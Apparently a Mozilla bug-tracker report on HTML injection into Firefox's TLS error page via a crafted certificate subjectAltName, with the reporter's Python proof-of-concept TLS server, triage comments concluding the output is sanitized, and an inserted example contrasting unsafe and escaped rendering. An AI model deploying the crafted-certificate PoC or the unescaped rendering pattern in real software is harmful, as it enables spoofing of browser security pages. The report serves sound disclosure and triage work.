Closed
Bug 1462904
Opened 8 years ago
Closed 7 years ago
Text/link injection into TLS error page
Categories
(Firefox :: Security, defect)
RESOLVED
WORKSFORME
People
(Reporter: bashscript, Unassigned, NeedInfo)
Details
(Keywords: csectype-spoof, reporter-external, sec-low)
Attachments
(3 files)
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20180326230345
Steps to reproduce:
from datetime import datetime, timedelta
import random

import OpenSSL.crypto
import OpenSSL.SSL
from twisted.internet import reactor, ssl
from twisted.internet.protocol import ClientFactory, Protocol


def generate():
    # Self-signed certificate whose subjectAltName is an HTML fragment instead
    # of a hostname; this string is what the TLS error page later displays.
    k = OpenSSL.crypto.PKey()
    k.generate_key(OpenSSL.crypto.TYPE_RSA, 1024)
    now = datetime.now()
    expire = now + timedelta(days=365)
    cert = OpenSSL.crypto.X509()
    cert.add_extensions([
        OpenSSL.crypto.X509Extension(
            b"subjectAltName", False,
            b", ".join([b'DNS:<a id="cert_domain_link" title="0111">ssss</a>']))
    ])
    cert.get_subject().C = "SY"
    cert.get_subject().ST = "Syria"
    cert.get_subject().L = "Syria"
    cert.get_subject().O = "Syria"
    cert.get_subject().OU = "Syria"
    cert.get_subject().CN = "Syria.hack.com"
    cert.set_serial_number(random.randint(990000, 999999999999999999999999999))
    cert.set_notBefore(now.strftime("%Y%m%d%H%M%SZ").encode())
    cert.set_notAfter(expire.strftime("%Y%m%d%H%M%SZ").encode())
    cert.set_issuer(cert.get_subject())  # self-signed: issuer == subject
    cert.set_pubkey(k)
    cert.sign(k, 'sha1')
    return cert, k


class EchoClient(Protocol):
    # Despite the name, this protocol runs on the listening (server) side.
    def connectionMade(self):
        print("hello, world")
        self.transport.write(b"hello, world!")

    def dataReceived(self, data):
        print("Server said:", data)
        self.transport.loseConnection()


class EchoClientFactory(ClientFactory):
    protocol = EchoClient

    def clientConnectionFailed(self, connector, reason):
        print("Connection failed - goodbye!")
        reactor.stop()

    def clientConnectionLost(self, connector, reason):
        print("Connection lost - goodbye!")
        reactor.stop()


class CtxFactory(ssl.ClientContextFactory):
    # Serves the generated certificate on every TLS handshake.
    def getContext(self):
        self.method = OpenSSL.SSL.SSLv23_METHOD
        ctx = ssl.ClientContextFactory.getContext(self)
        crt, key = generate()
        ctx.use_certificate(crt)
        ctx.use_privatekey(key)
        return ctx


if __name__ == '__main__':
    factory = EchoClientFactory()
    reactor.listenSSL(8000, factory, CtxFactory())
    reactor.run()
# DNS:XSS
Then, from Firefox on Linux (or another version, such as Firefox ESR), connect to the port at https://127.0.0.1:8000
Actual results:
I was surprised, when the certificate verification page was shown, to find an XSS vulnerability in the place that displays the domain.
Expected results:
View the domain without errors
My native language is Arabic (Syria), so please use a programming language to explain.
Comment on attachment 8979021 [details]
Screenshot from 2018-05-20 01-22-55.png
firefox-esr
Comment on attachment 8979020 [details]
Screenshot from 2018-05-20 01-28-15.png
firefox
Updated•8 years ago
Group: firefox-core-security → crypto-core-security
Component: Untriaged → Security: PSM
Product: Firefox → Core
Thanks for the report. So from your code and the screenshots it looks like you are able to corrupt the HTML of the certificate error page, but given that you are putting HTML code in your subjectAltName, I'm not actually sure if there is an error here. Do you have an example with a subjectAltName which demonstrates XSS (script injection)?
The code [1] which creates this page seems a little complicated. I've tried to trace this, but someone probably needs to debug this code to get an accurate picture of what is happening. From what I can see, we are supposed to show a link, only if the subjectAltName matches the end of document.location.host (or vice versa)[2]. Otherwise we should just show text.
Are the attached screenshots all taken with the same PoC code? (ie the PoC code from comment 0?) I'm not sure where the text "domain.com" comes from?
We'll need to figure out the actual impact here before we can assign a rating.
[1] https://searchfox.org/mozilla-central/source/browser/base/content/content.js#302
[2] https://searchfox.org/mozilla-central/source/browser/base/content/content.js#381
Flags: sec-bounty?
Comment 9•8 years ago
about:certerror is unprivileged which limits the damage considerably
https://searchfox.org/mozilla-central/source/browser/components/about/AboutRedirector.cpp#52-53
Could be used for spoofing if someone clicked on it, but there's much else available in that page. Could trigger the exception dialog or set the pref to always submit TLS errors to our Telemetry by sending appropriate events and postMessages. Since the code for about:certerror is shared you might be able to trigger opening the captive portal dialog or similar for anything about:neterror can show you. Some of the functions check which version of the page is showing and some will just honor whichever event they get.
I wouldn't expect a CA to allow HTML in a valid cert, but since it takes an invalid cert to trigger this error page anyway such an XSS is a legit attack vector. It just doesn't seem to do much here.
Looks like everything is fully sanitized though. In the single domain case we use getLocalizedFragment and in the multiple case we use ParentNode.append() which turns strings into safe text nodes.
https://searchfox.org/mozilla-central/source/browser/base/content/content.js#424
There's some code in there where we'll auto-link a bare name -- that's probably where the "domain.com" link comes from in attachment 8979022 [details].
In the older ESR code this is all turned into pure text using the .textContent property so there's no XSS
https://dxr.mozilla.org/mozilla-esr52/source/browser/base/content/content.js#300
That's attachment 8979020 [details]
I don't know what version attachment 8979021 [details] comes from. The cert error revamp was earlier this winter and probably landed in 60, less likely 59. Maybe '9021 is from 59.0.x? I have no idea what the "111" would be linked to though. Doesn't look like it's the intended injected link because that's still visible in the plain text.
Group: crypto-core-security → firefox-core-security
Component: Security: PSM → Security
Flags: needinfo?(bashscript)
Product: Core → Firefox
Summary: A security vulnerability that threatens the SSL certificate verification page → Text/link injection into TLS error page
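As an added example (not Firefox's code and not the reporter's), the two triage comments above describe two things worth seeing side by side: the auto-link rule (a SAN is linked only when it is a suffix of the current host, or vice versa) and the sanitization that makes the injected SAN harmless (every certificate-derived string becomes a text node via ParentNode.append() or .textContent, never markup). The Python below models that in string form: html.escape stands in for text-node creation, render_unsafe is the innerHTML-style pattern that would be exploitable, and render_safe is the pattern comment 9 credits the current page with. The function names, the exact suffix rule, the DNS-name check before linking, and the sample names beside the injected one are this example's own assumptions; the injected SAN string is the one from the PoC in comment 0.

```python
import html
import re

# Constructed inputs: the subjectAltName the PoC in comment 0 injects, plus two
# ordinary names that might sit beside it in a multi-name certificate.
INJECTED_SAN = '<a id="cert_domain_link" title="0111">ssss</a>'
SAN_NAMES = [INJECTED_SAN, "domain.com", "www.domain.com"]
CURRENT_HOST = "www.domain.com"

# Assumption of this example: only syntactically plausible DNS names are ever
# turned into links; anything else is displayed as text however it matches.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_DNS_NAME = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


def is_dns_name(san: str) -> bool:
    return bool(_DNS_NAME.match(san))


def should_link(san: str, host: str) -> bool:
    """Approximation of the auto-link rule described in the triage comments:
    link a SAN only if it equals the current host, is a parent of it, or is a
    child of it (suffix match on a label boundary, either direction).
    This is the example's reading of the rule, not Firefox's exact logic."""
    if not is_dns_name(san):
        return False
    san = san.lower().rstrip(".")
    host = host.lower().rstrip(".")
    return san == host or host.endswith("." + san) or san.endswith("." + host)


def render_unsafe(san_names, host) -> str:
    """Vulnerable pattern: certificate strings interpolated straight into
    markup. Assigned to innerHTML, a '<' inside a SAN becomes a live element."""
    parts = []
    for san in san_names:
        if should_link(san, host):
            parts.append(f'<a href="https://{san}/">{san}</a>')
        else:
            parts.append(san)  # injected HTML lands here unescaped
    return ", ".join(parts)


def render_safe(san_names, host) -> str:
    """Pattern comment 9 describes for the current page: each certificate
    string is escaped (html.escape here, the string analogue of creating a
    text node), so markup carried in a SAN is shown literally, never parsed."""
    parts = []
    for san in san_names:
        text = html.escape(san, quote=True)
        if should_link(san, host):
            parts.append(f'<a href="https://{text}/">{text}</a>')
        else:
            parts.append(text)
    return ", ".join(parts)


if __name__ == "__main__":
    print("unsafe:", render_unsafe(SAN_NAMES, CURRENT_HOST))
    print("safe:  ", render_safe(SAN_NAMES, CURRENT_HOST))
```

Run stand-alone, the unsafe rendering carries the `<a id="cert_domain_link" ...>` tag through intact, while the safe rendering shows it as `&lt;a id=&quot;cert_domain_link&quot; ...&gt;` and links only domain.com and www.domain.com. The DNS-name check matters independently of escaping: even a correctly escaped SAN should never be used to build an href unless it is a plausible hostname.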
Updated•8 years ago
Keywords: csectype-spoof, sec-low
Updated•7 years ago
Flags: sec-bounty? → sec-bounty-
Comment 10•7 years ago
I can verify that this appears to cause a seemingly harmless glitch in ESR 52 (I can't make it more harmful than what is shown in the screenshot; no onclick or href).
However, this doesn't seem to affect any recent version of Firefox, including ESR. Hence I think it's safe to close this bug.
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Resolution: --- → WORKSFORME
Updated•6 years ago
Group: firefox-core-security
Updated•2 years ago
Keywords: reporter-external